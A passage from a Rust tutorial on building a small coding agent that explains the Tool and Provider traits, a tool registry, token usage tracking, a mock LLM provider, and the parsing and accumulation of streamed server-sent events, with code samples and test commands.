.param_raw("changes", serde_json::json!({
    "type": "array",
    "items": {
        "type": "object",
        "properties": {
            "old_string": { "type": "string" },
            "new_string": { "type": "string" }
        }
    }
}), true)

Implement ToolDefinition in src/types.rs. There are no dedicated unit tests for the builder itself in the starter -- its correctness is exercised indirectly by every tool's _definition test (for example test_read_read_definition in tests/read.rs). Making cargo build -p mini-claw-code-starter succeed is the practical check here.


1.6 The Tool trait

This is the central abstraction. Every tool -- Bash, Read, Write, Edit -- implements this trait:

#[async_trait::async_trait]
pub trait Tool: Send + Sync {
    fn definition(&self) -> &ToolDefinition;
    async fn call(&self, args: Value) -> anyhow::Result<String>;
}

Just two required methods -- this is deliberately minimal:

definition() returns the tool's schema. This is called once when registering tools and whenever the agent needs to send tool definitions to the LLM. It returns a reference (&ToolDefinition) because the definition is static for the lifetime of the tool.

call() is the execution entry point. It receives the JSON arguments the LLM provided and returns a String result (or an error). This is async because most tools do I/O -- reading files, running subprocesses, making HTTP requests.

Note that call() returns anyhow::Result<String> -- not a ToolResult struct. The starter simplifies tool output to plain strings. If a tool fails, you can return Ok(format!("error: {e}")) to let the model see the error and recover, or return Err(e) for unrecoverable situations.

The trait uses #[async_trait] and is marked Send + Sync so tools can be stored as Box<dyn Tool> in the ToolSet and called from async contexts. For why Tool uses #[async_trait] while Provider uses RPITIT, see Why two async trait styles?.


1.7 ToolSet

The agent needs to look up tools by name when the LLM requests a tool call. ToolSet is a HashMap-backed registry:

pub struct ToolSet {
    tools: HashMap<String, Box<dyn Tool>>,
}

The key methods:

impl ToolSet {
    pub fn new() -> Self {
        Self { tools: HashMap::new() }
    }

    /// Builder-style: add a tool and return self.
    pub fn with(mut self, tool: impl Tool + 'static) -> Self {
        self.push(tool);
        self
    }

    /// Add a tool, keyed by its definition name.
    pub fn push(&mut self, tool: impl Tool + 'static) {
        let name = tool.definition().name.to_string();
        self.tools.insert(name, Box::new(tool));
    }

    /// Look up a tool by name.
    pub fn get(&self, name: &str) -> Option<&dyn Tool> {
        self.tools.get(name).map(|t| t.as_ref())
    }

    /// Collect all tool schemas for the provider.
    pub fn definitions(&self) -> Vec<&ToolDefinition> {
        self.tools.values().map(|t| t.definition()).collect()
    }
}

impl Default for ToolSet {
    fn default() -> Self {
        Self::new()
    }
}

A few design points:

  • with() enables builder-style chaining: ToolSet::new().with(ReadTool::new()).with(BashTool::new()).
  • push() extracts the name from the tool's definition, so you never pass the name manually -- one source of truth.
  • definitions() collects all schemas into a Vec that the provider sends to the LLM at the start of each turn.
  • Box<dyn Tool> is the trait object that makes heterogeneous storage possible. The 'static bound on push/with ensures the tool lives long enough.

ToolSet has no dedicated test of its own in the starter -- it is exercised by the test_single_turn_* suite (Chapter 3) and test_multi_tool_* suite (Chapter 12), both of which construct real ToolSets and assert their definitions are rendered correctly.
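The trait-object mechanics can be seen in miniature with a synchronous stand-in. The real Tool trait is async and returns anyhow::Result<String>; this sketch drops both so it runs with the standard library alone:

```rust
use std::collections::HashMap;

// Synchronous stand-in for the starter's `Tool` trait -- async and error
// handling are omitted so the trait-object mechanics stand alone.
trait Tool {
    fn name(&self) -> &'static str;
    fn call(&self, input: &str) -> String;
}

struct EchoTool;
impl Tool for EchoTool {
    fn name(&self) -> &'static str { "echo" }
    fn call(&self, input: &str) -> String { input.to_string() }
}

struct UpperTool;
impl Tool for UpperTool {
    fn name(&self) -> &'static str { "upper" }
    fn call(&self, input: &str) -> String { input.to_uppercase() }
}

struct ToolSet {
    // Box<dyn Tool> allows heterogeneous storage: different concrete
    // tool types behind one trait-object key space.
    tools: HashMap<String, Box<dyn Tool>>,
}

impl ToolSet {
    fn new() -> Self { Self { tools: HashMap::new() } }
    fn with(mut self, tool: impl Tool + 'static) -> Self {
        self.tools.insert(tool.name().to_string(), Box::new(tool));
        self
    }
    fn get(&self, name: &str) -> Option<&dyn Tool> {
        self.tools.get(name).map(|t| t.as_ref())
    }
}

fn main() {
    let tools = ToolSet::new().with(EchoTool).with(UpperTool);
    assert_eq!(tools.get("upper").unwrap().call("hi"), "HI");
    assert!(tools.get("missing").is_none());
}
```

The `'static` bound and the box together are what let two unrelated structs live in one map; everything else is ordinary HashMap plumbing.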


1.8 TokenUsage

LLM APIs report token counts with each response. Tracking these is useful for cost awareness and debugging.

#[derive(Debug, Clone, Default)]
pub struct TokenUsage {
    pub input_tokens: u64,
    pub output_tokens: u64,
}

The starter uses a simplified TokenUsage with just input and output token counts. It is stored as Option<TokenUsage> in AssistantTurn -- mock providers in tests set it to None, while the real OpenRouterProvider populates it from the API response.
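A quick sketch of how such a struct accumulates across turns. The summing helper here is illustrative, not part of the starter:

```rust
#[derive(Debug, Clone, Default)]
struct TokenUsage {
    input_tokens: u64,
    output_tokens: u64,
}

// Illustrative helper: fold per-turn usage (Some from a real provider,
// None from a mock) into a running total.
fn total(turns: &[Option<TokenUsage>]) -> TokenUsage {
    turns.iter().flatten().fold(TokenUsage::default(), |mut acc, u| {
        acc.input_tokens += u.input_tokens;
        acc.output_tokens += u.output_tokens;
        acc
    })
}

fn main() {
    let turns = vec![
        Some(TokenUsage { input_tokens: 120, output_tokens: 45 }),
        None, // a mocked turn reports no usage
        Some(TokenUsage { input_tokens: 300, output_tokens: 80 }),
    ];
    let t = total(&turns);
    assert_eq!((t.input_tokens, t.output_tokens), (420, 125));
}
```

Note how `flatten()` skips the `None` turns, which is exactly the behavior you want when mock and real providers are mixed in one run.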

The Default impl is covered by test_cost_tracker_token_usage_default in tests/cost_tracker.rs (used again in Chapter 17). If you want to run it in isolation:

cargo test -p mini-claw-code-starter test_cost_tracker_token_usage_default

1.9 The Provider trait

The Provider trait is defined in src/types.rs. It abstracts over any LLM backend:

pub trait Provider: Send + Sync {
    fn chat<'a>(
        &'a self,
        messages: &'a [Message],
        tools: &'a [&'a ToolDefinition],
    ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send + 'a;
}

Unlike Tool, Provider uses RPITIT (return-position impl Trait in traits) rather than #[async_trait]. The full trade-off is covered in Why two async trait styles?.

A blanket impl lets Arc<P> also be a Provider, which is needed later for sharing a provider between an agent and its subagents:

impl<P: Provider> Provider for Arc<P> { ... }

We implement the MockProvider in Chapter 5a and the OpenRouterProvider in Chapter 5b.


Putting it all together

After implementing src/types.rs, run the full chapter test suite:

cargo test -p mini-claw-code-starter test_mock_

What the tests verify

  • test_mock_message_user -- constructs a Message::User and verifies it holds the expected string
  • test_mock_message_system -- constructs a Message::System and verifies it holds the expected string
  • test_mock_message_tool_result -- constructs a Message::ToolResult and verifies both id and content are correct
  • test_mock_assistant_turn -- builds an AssistantTurn with text and verifies stop_reason is Stop
  • test_mock_tool_definition_builder -- uses the builder to add parameters and verifies the resulting JSON schema has the correct structure
  • test_mock_tool_definition_optional_param -- adds an optional parameter and verifies it does not appear in the required array
  • test_mock_toolset_empty -- creates an empty ToolSet and verifies get() returns None for any name
  • test_mock_token_usage_default -- verifies that TokenUsage::default() initializes both counters to zero

What you built

This chapter established the type vocabulary for the entire agent:

  • Message -- a four-variant enum carrying every kind of conversation entry: system instructions, user input, assistant responses, and tool results.
  • AssistantTurn -- the model's response, containing optional text, tool calls, a stop reason, and optional token usage.
  • StopReason -- the binary signal that drives the agent loop: keep going or stop.
  • ToolDefinition -- a builder for JSON Schema tool descriptions that the LLM uses to understand what tools are available.
  • ToolCall -- the request side of tool execution, linked by ID to Message::ToolResult.
  • Tool trait -- the minimal async interface every tool must implement: definition() and call().
  • ToolSet -- a HashMap-backed registry for looking up tools by name at runtime.
  • Provider trait -- the async LLM abstraction, generic over any backend.
  • TokenUsage -- per-request token tracking.

Key takeaway

The entire agent -- tools, providers, the loop itself -- is built on the vocabulary defined in this chapter. Getting these types right (especially the Message enum and StopReason) determines whether the agent loop is simple or tangled. The types are the contract; everything else is implementation.

None of these types do anything on their own -- they are the nouns of the system. In the next chapter, we will implement the MockProvider and OpenRouterProvider, giving these types their first verbs.

Check yourself



Chapter 5a: Provider & Streaming Foundations

File(s) to edit: src/streaming.rs — every stub tagged TODO ch5a: (everything except StreamingAgent, which is Ch5b's).

src/mock.rs already carries the MockProvider stubs you filled in Chapter 1; this chapter leans on that work but does not re-fill it. If you skipped ahead from Ch1, go back and finish the TODO ch1: stubs first.

Tests to run: cargo test -p mini-claw-code-starter test_mock_ and cargo test -p mini-claw-code-starter test_streaming_parse_ test_streaming_accumulator_

Estimated time: 35 min

Goal

  • Revisit MockProvider (built in Ch1) as the canonical example of the Provider trait, and use it to motivate the streaming siblings below.
  • Implement parse_sse_line so we can turn a single SSE line into StreamEvents.
  • Implement StreamAccumulator so a stream of deltas reassembles into a complete AssistantTurn.
  • Implement MockStreamProvider so UI-facing code can be tested without a real HTTP connection.
  • Understand when to reach for std::sync::Mutex vs tokio::sync::Mutex in async code.

Chapter 4 defined the data that flows through the agent. This chapter and the next turn those types into something that can actually produce data — an LLM backend. We split the work into two halves:

  • Ch5a (this chapter): the abstractions and testable foundations — traits, mock providers, SSE parsing, stream accumulation.
  • Ch5b: the real HTTP provider (OpenRouterProvider) and the StreamingAgent that wires a stream channel through the agent loop.

Keeping streaming plumbing (this chapter) separate from networking and orchestration (next chapter) makes each part testable in isolation.


How streaming works end-to-end

For orientation, here is what the finished system looks like. Don't worry about the StreamingAgent and OpenRouter API boxes yet — those belong to 5b. This chapter builds every other box.

sequenceDiagram
    participant Agent
    participant StreamProvider
    participant API as LLM API
    participant Channel as mpsc channel
    participant UI

    Agent->>StreamProvider: stream_chat(messages, tools, tx)
    StreamProvider->>API: POST /chat/completions (stream: true)
    loop SSE chunks
        API-->>StreamProvider: data: {"delta": ...}
        StreamProvider->>StreamProvider: parse_sse_line
        StreamProvider->>Channel: send(StreamEvent)
        StreamProvider->>StreamProvider: accumulator.feed(event)
        Channel-->>UI: recv() and render
    end
    API-->>StreamProvider: data: [DONE]
    StreamProvider->>Agent: return accumulator.finish()

Why a trait?

A coding agent needs to call an LLM, but which LLM should not be hard-coded. During tests we want instant, deterministic responses. In production we want streaming over HTTP. The Provider trait gives us that seam.

Claude Code uses a similar abstraction internally — every LLM call goes through a provider interface, and the choice of backend (Anthropic API, Bedrock, Vertex) is resolved at startup.

The Provider trait (RPITIT)

Here is the full trait:

pub trait Provider: Send + Sync {
    fn chat<'a>(
        &'a self,
        messages: &'a [Message],
        tools: &'a [&'a ToolDefinition],
    ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send + 'a;
}

A few things to notice:

No #[async_trait]. The Provider trait uses return-position impl Trait in traits (RPITIT) — stabilized in Rust 1.75. Writing fn chat(...) -> impl Future<...> instead of async fn chat(...) gives us explicit control over the lifetime and Send bound; async fn in a trait does not always infer Send for the returned future, which would prevent spawning onto a multi-threaded runtime. The explicit impl Future<...> + Send + 'a signature solves that, and it avoids the heap allocation that #[async_trait] would require.

The Tool trait in Chapter 6 uses #[async_trait] for the opposite reason — object safety for heterogeneous storage. For the full explanation of when to pick which style, see Why two async trait styles?. The one-liner version is also in Chapter 2.

Why Send + Sync on the trait itself? Our agent loop will hold a P: Provider behind a shared reference (and later behind Arc). The Sync bound lets multiple tasks share the provider, and Send lets it cross thread boundaries.

Lifetime 'a everywhere. The returned future borrows both &self and the input slices. Tying them to a single lifetime 'a tells the compiler the future lives no longer than those borrows, avoiding 'static requirements.

The Provider trait is already defined in src/types.rs (Chapter 4). The starter puts it alongside the message types because everything lives in a flat layout.

The Arc<P> blanket impl

Directly below the Provider trait, the starter has:

impl<P: Provider> Provider for Arc<P> {
    fn chat<'a>(
        &'a self,
        messages: &'a [Message],
        tools: &'a [&'a ToolDefinition],
    ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send + 'a {
        (**self).chat(messages, tools)
    }
}

This says: "if P is a Provider, then Arc<P> is also a Provider." It just dereferences through the Arc and delegates to the inner value.

Why does this matter? Later, when we build subagents, the main agent and its subagents will share the same provider. Cloning an Arc is cheap, and the blanket impl means subagent code that is generic over P: Provider works identically whether it receives a bare provider or a shared one. Without this impl, you would need separate type plumbing to pass shared providers around.
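The same blanket-impl shape works for any trait. Here it is with a small synchronous trait (Greet is invented for the example) so it runs standalone:

```rust
use std::sync::Arc;

// Invented example trait -- the point is the blanket impl shape,
// not the trait itself.
trait Greet {
    fn greet(&self) -> String;
}

struct English;
impl Greet for English {
    fn greet(&self) -> String { "hello".to_string() }
}

// "If P is Greet, then Arc<P> is also Greet": deref through the Arc
// and delegate to the inner value.
impl<P: Greet> Greet for Arc<P> {
    fn greet(&self) -> String {
        (**self).greet()
    }
}

// Generic code works with bare or shared implementors alike.
fn announce(g: &impl Greet) -> String {
    format!("{}!", g.greet())
}

fn main() {
    let shared = Arc::new(English);
    assert_eq!(announce(&English), "hello!");
    assert_eq!(announce(&shared), "hello!"); // same generic fn, shared value
}
```

`announce` never needs to know whether it was handed `English` or `Arc<English>` — that is exactly the property the subagent code relies on.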

Both the Provider trait and the Arc<P> blanket impl are already in src/types.rs.


MockProvider

Testing an agent against a live API is slow, expensive, and nondeterministic. The MockProvider lets you script exact responses and verify that your agent handles them correctly.

use std::collections::VecDeque;
use std::sync::Mutex;

pub struct MockProvider {
    responses: Mutex<VecDeque<AssistantTurn>>,
}

impl MockProvider {
    pub fn new(responses: VecDeque<AssistantTurn>) -> Self {
        Self {
            responses: Mutex::new(responses),
        }
    }
}

impl Provider for MockProvider {
    async fn chat(
        &self,
        _messages: &[Message],
        _tools: &[&ToolDefinition],
    ) -> anyhow::Result<AssistantTurn> {
        self.responses
            .lock()
            .unwrap()
            .pop_front()
            .ok_or_else(|| anyhow::anyhow!("MockProvider: no more responses"))
    }
}

Rust concept: std::sync::Mutex vs tokio::sync::Mutex

The Provider trait takes &self (not &mut self), because providers are shared. But we need to mutate the queue. Which Mutex should we use?

The rule of thumb: use std::sync::Mutex when the critical section is trivial (no .await inside the lock), and tokio::sync::Mutex when you need to hold the lock across an .await point. Here the critical section is just a pop_front — a single pointer operation. Using tokio::sync::Mutex would add unnecessary overhead (it is an async-aware lock that yields to the runtime). std::sync::Mutex is cheaper and perfectly safe because the lock is never held long enough to block the runtime.

The design:

  • VecDeque — responses are consumed in FIFO order. The first call to chat returns the first response, the second call returns the second, and so on.
  • Mutex — wraps the queue so &self methods can mutate it. See the Rust concept note above for why std::sync::Mutex is the right choice here.
  • Error on exhaustion — if the test scripts three responses but the agent calls chat a fourth time, it gets an explicit error instead of a panic. This catches agent loops that spin more times than expected.
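The FIFO-with-interior-mutability core is small enough to exercise on its own with plain stdlib types (the names here are illustrative, not the starter's):

```rust
use std::collections::VecDeque;
use std::sync::Mutex;

// Stdlib-only sketch of the mock's core: &self methods mutate a scripted
// queue through a Mutex, and exhaustion is an error, not a panic.
struct ScriptedQueue {
    responses: Mutex<VecDeque<String>>,
}

impl ScriptedQueue {
    fn new(responses: VecDeque<String>) -> Self {
        Self { responses: Mutex::new(responses) }
    }

    fn next(&self) -> Result<String, String> {
        self.responses
            .lock()
            .unwrap() // lock held only for the pop -- no .await inside
            .pop_front()
            .ok_or_else(|| "no more responses".to_string())
    }
}

fn main() {
    let q = ScriptedQueue::new(VecDeque::from([
        "first".to_string(),
        "second".to_string(),
    ]));
    assert_eq!(q.next().unwrap(), "first");
    assert_eq!(q.next().unwrap(), "second");
    assert!(q.next().is_err()); // a third call is caught, not a panic
}
```

The `&self` signature plus the Mutex is the whole trick: callers share the queue immutably while the pops still mutate it.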

Testing strategy

The MockProvider is the foundation of all our tests. By scripting the exact sequence of responses, you can test:

  • Single-turn: one response with StopReason::Stop
  • Tool use loops: first response has StopReason::ToolUse with tool calls, the agent executes them and sends results back, second response has StopReason::Stop
  • Multi-turn sequences: any number of scripted turns
  • Error handling: an empty queue returns an error

A typical test:

#[tokio::test]
async fn mock_returns_text() {
    let provider = MockProvider::new(VecDeque::from([AssistantTurn {
        text: Some("Hello!".into()),
        tool_calls: vec![],
        stop_reason: StopReason::Stop,
        usage: None,
    }]));
    let turn = provider.chat(&[Message::User("Hi".into())], &[]).await.unwrap();
    assert_eq!(turn.text.as_deref(), Some("Hello!"));
}

Notice that the mock ignores the messages input — it does not look at what the agent sends. This is intentional. You are testing the agent's behavior given a known provider response, not the provider's ability to understand prompts.

Your task

Open src/mock.rs in the starter. You will see the MockProvider struct with unimplemented!() stubs. Fill in new() and the Provider impl.


StreamEvent

Before defining the streaming trait, we need a vocabulary for the incremental chunks an LLM sends back:

#[derive(Debug, Clone, PartialEq)]
pub enum StreamEvent {
    /// A fragment of the model's text response.
    TextDelta(String),
    /// The beginning of a tool call (carries the call ID and tool name).
    ToolCallStart {
        index: usize,
        id: String,
        name: String,
    },
    /// A fragment of a tool call's JSON arguments.
    ToolCallDelta {
        index: usize,
        arguments: String,
    },
    /// The stream is complete.
    Done,
}

These four variants map directly to the OpenAI streaming API:

  • TextDelta — a fragment of the model's natural-language output (e.g. "Hello", then " world").
  • ToolCallStart — the model has begun a tool call. index identifies which call (a single turn can request multiple tools), id is a server-assigned correlation ID, and name is the tool.
  • ToolCallDelta — a fragment of the JSON arguments for the call at index. Arguments arrive incrementally because the model generates JSON token-by-token.
  • Done — end-of-stream signal.

The index field matters because streaming interleaves fragments from multiple tool calls, and consumers need to know which call each fragment belongs to.

The StreamProvider trait

pub trait StreamProvider: Send + Sync {
    fn stream_chat<'a>(
        &'a self,
        messages: &'a [Message],
        tools: &'a [&'a ToolDefinition],
        tx: mpsc::UnboundedSender<StreamEvent>,
    ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send + 'a;
}

The design uses a channel-based streaming model rather than returning an AsyncIterator or Stream. The caller creates a tokio::sync::mpsc::unbounded_channel(), passes the sender half to stream_chat, and reads events from the receiver half — typically in a separate task that renders them to the terminal.

The method itself still returns the fully assembled AssistantTurn when the stream is complete. This means the agent loop always gets a clean AssistantTurn to work with, regardless of whether streaming is enabled. The channel is a side-channel for the UI.

Why UnboundedSender instead of a bounded channel? Streaming events are tiny and arrive at network speed, not faster. Backpressure is unnecessary because the bottleneck is the API, not the consumer. An unbounded channel keeps the API simpler.
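The producer/consumer shape looks like this with std::sync::mpsc standing in for tokio's unbounded channel (the send/recv surface is analogous, minus async):

```rust
use std::sync::mpsc;
use std::thread;

// Sketch of the channel-based streaming model, with std::sync::mpsc and a
// thread standing in for tokio::sync::mpsc and a task. The producer pushes
// deltas through the channel for the UI, yet still returns the full result.
fn stream_and_render() -> (String, String) {
    let (tx, rx) = mpsc::channel::<String>();

    // "Provider" side: send each delta, keep building the complete turn.
    let producer = thread::spawn(move || {
        let mut full = String::new();
        for delta in ["Hel", "lo, ", "world"] {
            let _ = tx.send(delta.to_string()); // ignore errors: receiver may be gone
            full.push_str(delta);
        }
        full // the caller still gets a complete, assembled value
    });

    // "UI" side: render fragments as they arrive; the loop ends when tx drops.
    let mut rendered = String::new();
    for delta in rx {
        rendered.push_str(&delta);
    }

    (rendered, producer.join().unwrap())
}

fn main() {
    let (rendered, full) = stream_and_render();
    assert_eq!(rendered, full);
    assert_eq!(full, "Hello, world");
}
```

The key property carries over to the async version: the UI sees incremental fragments through the channel, while the caller of the producer gets one assembled value at the end.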

The StreamEvent enum and StreamProvider trait both live in src/streaming.rs in the starter.


MockStreamProvider

The MockStreamProvider wraps a MockProvider and synthesizes StreamEvents from each canned response. This lets you test UI code that consumes stream events without needing a real HTTP connection.

The struct wraps a MockProvider and its stream_chat impl works in three steps:

  1. Delegate to self.inner.chat() to get the canned AssistantTurn
  2. Decompose it into events: text is sent character-by-character as TextDelta events, each tool call emits a ToolCallStart + single ToolCallDelta, and a final Done is sent
  3. Return the original AssistantTurn unchanged

Here is the full implementation:

pub struct MockStreamProvider {
    inner: MockProvider,
}

impl MockStreamProvider {
    pub fn new(responses: VecDeque<AssistantTurn>) -> Self {
        Self {
            inner: MockProvider::new(responses),
        }
    }
}

impl StreamProvider for MockStreamProvider {
    async fn stream_chat(
        &self,
        messages: &[Message],
        tools: &[&ToolDefinition],
        tx: mpsc::UnboundedSender<StreamEvent>,
    ) -> anyhow::Result<AssistantTurn> {
        let turn = self.inner.chat(messages, tools).await?;

        // Synthesize stream events from the complete turn
        if let Some(ref text) = turn.text {
            for ch in text.chars() {
                let _ = tx.send(StreamEvent::TextDelta(ch.to_string()));
            }
        }
        for (i, call) in turn.tool_calls.iter().enumerate() {
            let _ = tx.send(StreamEvent::ToolCallStart {
                index: i,
                id: call.id.clone(),
                name: call.name.clone(),
            });
            let _ = tx.send(StreamEvent::ToolCallDelta {
                index: i,
                arguments: call.arguments.to_string(),
            });
        }
        let _ = tx.send(StreamEvent::Done);

        Ok(turn)
    }
}

This avoids duplicating the response queue logic — the inner.chat() call handles the VecDeque pop. The let _ = tx.send(...) pattern intentionally ignores send errors — if the receiver is dropped, nobody is listening, and that is fine.

Your task

Fill in MockStreamProvider::new() and its stream_chat() stub in src/streaming.rs.


Server-Sent Events and parse_sse_line

When the real provider requests stream: true, the API returns a stream of Server-Sent Events (SSE). SSE is a simple text protocol over HTTP:

data: {"choices":[{"delta":{"content":"Hello"},"finish_reason":null}]}

data: {"choices":[{"delta":{"content":" world"},"finish_reason":null}]}

data: [DONE]

Each event is a line starting with data: followed by a JSON payload (or the special string [DONE]). Events are separated by blank lines. That is the entire protocol — no framing, no length prefixes, just newline-delimited text. This simplicity is why SSE is the standard for LLM streaming.
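The framing layer alone — prefix stripping and the [DONE] sentinel — can be shown without any JSON parsing. This is a simplified sketch, not the starter's parse_sse_line:

```rust
// Simplified SSE framing: classify a line without parsing the JSON payload.
// The real parse_sse_line goes further and deserializes the chunk.
#[derive(Debug, PartialEq)]
enum SseLine<'a> {
    Data(&'a str), // JSON payload, still to be parsed
    Done,          // the "[DONE]" sentinel
    Ignored,       // blank lines, "event: ping", etc.
}

fn classify(line: &str) -> SseLine<'_> {
    match line.strip_prefix("data: ") {
        Some("[DONE]") => SseLine::Done,
        Some(payload) => SseLine::Data(payload),
        None => SseLine::Ignored,
    }
}

fn main() {
    assert_eq!(
        classify(r#"data: {"choices":[]}"#),
        SseLine::Data(r#"{"choices":[]}"#)
    );
    assert_eq!(classify("data: [DONE]"), SseLine::Done);
    assert_eq!(classify("event: ping"), SseLine::Ignored);
    assert_eq!(classify(""), SseLine::Ignored);
}
```

Everything the real parser does beyond this is JSON interpretation of the `Data` payload.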

Our parse_sse_line function handles a single line:

pub fn parse_sse_line(line: &str) -> Option<Vec<StreamEvent>> {
    let data = line.strip_prefix("data: ")?;
    if data == "[DONE]" {
        return Some(vec![StreamEvent::Done]);
    }

    let chunk: ChunkResponse = serde_json::from_str(data).ok()?;
    let choice = chunk.choices.into_iter().next()?;
    let mut events = Vec::new();

    if let Some(text) = choice.delta.content
        && !text.is_empty()
    {
        events.push(StreamEvent::TextDelta(text));
    }

    if let Some(tool_calls) = choice.delta.tool_calls {
        for tc in tool_calls {
            if let Some(id) = tc.id {
                let name = tc.function
                    .as_ref()
                    .and_then(|f| f.name.clone())
                    .unwrap_or_default();
                events.push(StreamEvent::ToolCallStart {
                    index: tc.index,
                    id,
                    name,
                });
            }
            if let Some(ref func) = tc.function
                && let Some(ref args) = func.arguments
                && !args.is_empty()
            {
                events.push(StreamEvent::ToolCallDelta {
                    index: tc.index,
                    arguments: args.clone(),
                });
            }
        }
    }

    if events.is_empty() { None } else { Some(events) }
}

Walk through the logic:

  1. Strip the data: prefix. Lines that do not start with data: (like event: ping or blank lines) return None — they are not data events.
  2. Check for [DONE]. This is the OpenAI-standard end-of-stream sentinel. Return a Done event.
  3. Parse JSON into ChunkResponse. If the JSON is malformed, .ok()? silently skips it. This is intentional — SSE streams occasionally include keep-alive pings or malformed chunks, and crashing would be worse than dropping a token.
  4. Extract text deltas. The delta.content field contains the text fragment. Empty strings are skipped.
  5. Extract tool call events. A single chunk can contain both a ToolCallStart (when the id field is present, signaling a new call) and a ToolCallDelta (when arguments is present). The if let ... && let ... syntax is Rust's let-chains feature, stabilized in edition 2024.

Rust concept: let-chains

The if let Some(ref func) = tc.function && let Some(ref args) = func.arguments syntax combines two pattern matches into a single if expression. Before let-chains, you would need nested if let blocks or a match with a tuple. Let-chains flatten the nesting and make the condition more readable. The ref keyword borrows the matched value instead of moving it, which is necessary here because tc is used again after the if let.

The tests verify the parser against three cases: a text delta line produces StreamEvent::TextDelta("Hello"), the data: [DONE] line produces StreamEvent::Done, and non-data lines like event: ping or empty strings return None.

Your task

The parse_sse_line function and its SSE deserialization types (ChunkResponse, ChunkChoice, Delta, DeltaToolCall, DeltaFunction) are in src/streaming.rs. Fill in the parse_sse_line stub.


StreamAccumulator

Streaming gives the UI real-time output, but the agent loop needs a complete AssistantTurn to decide what to do next. The StreamAccumulator bridges this gap — it collects events as they arrive and produces a finished message at the end.

pub struct StreamAccumulator {
    text: String,
    tool_calls: Vec<PartialToolCall>,
}

struct PartialToolCall {
    id: String,
    name: String,
    arguments: String,
}

The two key methods:

impl StreamAccumulator {
    pub fn new() -> Self {
        Self {
            text: String::new(),
            tool_calls: Vec::new(),
        }
    }

    pub fn feed(&mut self, event: &StreamEvent) {
        match event {
            StreamEvent::TextDelta(s) => self.text.push_str(s),
            StreamEvent::ToolCallStart { index, id, name } => {
                // Ensure the Vec is large enough for this index
                while self.tool_calls.len() <= *index {
                    self.tool_calls.push(PartialToolCall {
                        id: String::new(),
                        name: String::new(),
                        arguments: String::new(),
                    });
                }
                self.tool_calls[*index].id = id.clone();
                self.tool_calls[*index].name = name.clone();
            }
            StreamEvent::ToolCallDelta { index, arguments } => {
                if let Some(tc) = self.tool_calls.get_mut(*index) {
                    tc.arguments.push_str(arguments);
                }
            }
            StreamEvent::Done => {}
        }
    }

    pub fn finish(self) -> AssistantTurn {
        let text = if self.text.is_empty() {
            None
        } else {
            Some(self.text)
        };
        let tool_calls: Vec<ToolCall> = self
            .tool_calls
            .into_iter()
            .filter(|tc| !tc.name.is_empty())
            .map(|tc| ToolCall {
                id: tc.id,
                name: tc.name,
                arguments: serde_json::from_str(&tc.arguments)
                    .unwrap_or(Value::Null),
            })
            .collect();
        let stop_reason = if tool_calls.is_empty() {
            StopReason::Stop
        } else {
            StopReason::ToolUse
        };
        AssistantTurn {
            text,
            tool_calls,
            stop_reason,
            usage: None,
        }
    }
}

Design notes:

  • feed appends incrementally. Text fragments concatenate into self.text. Tool call arguments concatenate per-index into PartialToolCall::arguments.
  • Sparse index handling. The while loop in ToolCallStart pads the vector with empty entries so that index: 2 works even if the vector only has one element. The filter(|tc| !tc.name.is_empty()) in finish strips those placeholders.
  • Deferred JSON parsing. Arguments arrive as string fragments during streaming. finish parses the concatenated string into serde_json::Value only after the stream ends, falling back to Value::Null on malformed JSON.
  • stop_reason is derived from the tool calls. If any survived the filter, it is ToolUse; otherwise Stop. Usage is None because most streaming APIs do not include token counts per chunk.
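The sparse-index bookkeeping can be isolated into a stdlib-only sketch (pad_to is a hypothetical helper mirroring the while loop in feed):

```rust
// Stdlib-only sketch of the accumulator's index handling: pad the Vec so
// an arbitrary index is addressable, then append fragments per index.
// `pad_to` is a hypothetical helper, not a starter function.
fn pad_to(args: &mut Vec<String>, index: usize) {
    while args.len() <= index {
        args.push(String::new()); // placeholder; empty entries are filtered later
    }
}

fn main() {
    let mut args: Vec<String> = Vec::new();

    // A ToolCallStart { index: 1, .. } may arrive before index 0 has content.
    pad_to(&mut args, 1);

    // ToolCallDelta fragments concatenate per index.
    args[1].push_str(r#"{"path":"#);
    args[1].push_str(r#""main.rs"}"#);

    assert_eq!(args.len(), 2);
    assert_eq!(args[0], ""); // placeholder, stripped by finish()'s filter
    assert_eq!(args[1], r#"{"path":"main.rs"}"#);
}
```

Only once the stream ends does the concatenated string get parsed as JSON — exactly the deferred-parsing point from the notes above.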

The accumulator tests (test_streaming_accumulator_text, test_streaming_accumulator_tool_call) feed two text deltas or a tool-call-start plus two argument fragments and verify that the concatenated result is what you'd expect.

Your task

The StreamAccumulator and PartialToolCall are in src/streaming.rs. Fill in the new(), feed(), and finish() stubs.


Run the tests

cargo test -p mini-claw-code-starter test_mock_
cargo test -p mini-claw-code-starter test_streaming_parse_
cargo test -p mini-claw-code-starter test_streaming_accumulator_

What these tests verify

test_mock_ (MockProvider):

  • test_mock_mock_returns_text — scripts a single text response and verifies chat() returns it
  • test_mock_mock_exhausted — calls chat() on an empty queue and verifies it returns an error

test_streaming_parse_ (SSE parser):

  • test_streaming_parse_text_delta — feeds a data: line with text content and verifies a TextDelta event is produced
  • test_streaming_parse_done — feeds data: [DONE] and verifies a Done event is produced
  • test_streaming_parse_non_data_lines — feeds a non-data line like event: ping and verifies None is returned

test_streaming_accumulator_ (stream reassembly):

  • test_streaming_accumulator_text — feeds two TextDelta events and verifies the concatenated result
  • test_streaming_accumulator_tool_call — feeds a ToolCallStart and two ToolCallDelta fragments, verifies they reassemble into a valid ToolCall with parsed JSON arguments

Everything else (test_openrouter_, test_streaming_streaming_agent_, test_streaming_stream_chat_) belongs to Chapter 5b.


Key takeaway

The provider layer decouples the agent from any specific LLM backend. MockProvider makes tests fast and deterministic; the StreamProvider trait pipes incremental events out on a channel while the method itself still returns a clean AssistantTurn; StreamAccumulator is the bridge that lets the UI see tokens as they arrive while the agent loop sees a complete message.

Everything in this chapter is testable without a network. Next up in Chapter 5b, we plug these primitives into a real HTTP provider and wire the events channel through the agent loop.

Check yourself


← Chapter 4: Messages & Types · Contents · Chapter 5b: OpenRouter & StreamingAgent →

Chapter 5b: OpenRouter & StreamingAgent

File(s) to edit: src/providers/openrouter.rs, src/streaming.rs (the StreamingAgent block at the bottom)
Tests to run: cargo test -p mini-claw-code-starter test_openrouter_, cargo test -p mini-claw-code-starter test_streaming_streaming_agent_, cargo test -p mini-claw-code-starter test_streaming_stream_chat_
Estimated time: 35 min

Goal

